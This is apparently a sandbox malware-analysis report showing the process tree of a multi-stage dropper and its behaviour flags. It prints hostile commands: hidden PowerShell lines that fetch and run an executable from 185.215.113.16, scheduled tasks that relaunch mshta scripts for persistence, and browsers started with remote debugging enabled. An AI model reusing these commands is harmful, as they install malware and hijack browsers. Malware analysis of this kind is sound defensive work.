wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 1004 1640 chrome.exe 99 PID 1640 wrote to memory of 208 1640 chrome.exe 100 PID 1640 wrote to memory of 208 1640 chrome.exe 100 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101 PID 1640 wrote to memory of 64 1640 chrome.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P0p33.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W41I9.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5452
-
-
C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
PID:5548 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5968
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6128 -
C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:368
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:3292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word6⤵
- System Location Discovery: System Language Discovery
PID:4536 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "XgBsCma2dsa" /tr "mshta \"C:\Temp\ILvKar5Uh.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5796
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ILvKar5Uh.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5596 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1320
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4920 -
C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5212 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2720 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"6⤵
- Executes dropped EXE
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"6⤵
- Executes dropped EXE
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 9646⤵
- Program crash
PID:4508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5728
-
-
C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff95bb7cc40,0x7ff95bb7cc4c,0x7ff95bb7cc584⤵PID:2432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2012 /prefetch:24⤵PID:1004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:34⤵PID:208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:84⤵PID:64
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:14⤵
- Uses browser remote debugging
PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3328,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:14⤵
- Uses browser remote debugging
PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:14⤵
- Uses browser remote debugging
PID:4428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:84⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:84⤵PID:1624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:84⤵PID:2224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:84⤵PID:3924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4596 /prefetch:84⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:84⤵PID:2488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:84⤵PID:1768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:84⤵PID:1420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:24⤵
- Uses browser remote debugging
PID:5880
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5312 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff95bb846f8,0x7ff95bb84708,0x7ff95bb847184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:24⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2512 /prefetch:24⤵PID:724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:84⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:24⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:24⤵PID:532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:14⤵
- Uses browser remote debugging
PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:14⤵
- Uses browser remote debugging
PID:2388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:24⤵PID:4000
-
-
